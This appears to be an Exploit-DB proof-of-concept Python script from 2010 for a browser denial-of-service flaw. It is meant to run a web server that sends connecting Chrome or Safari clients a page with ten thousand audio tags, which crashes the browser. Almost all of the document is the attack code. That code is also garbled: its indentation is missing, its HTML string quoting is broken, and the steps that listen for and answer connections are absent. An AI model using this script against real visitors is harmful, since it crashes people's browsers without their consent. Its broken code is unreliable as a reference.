#Multiple Browsers Audio Tag Denial of Service Vulnerability
#any ogg file can be used for the DoS as long as it is a valid file on the server
#crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
#This script acts as a web server to DoS connecting clients
# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
import sys, socket;
def main():
html = """
html += "<audio src='https://www.exploit-db.com/exploits/12324/myogg.ogg'>" * 10000;
html += """
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
s.bind(('', 2121));
while True:
channel, details = s.accept();
print channel.recv(256);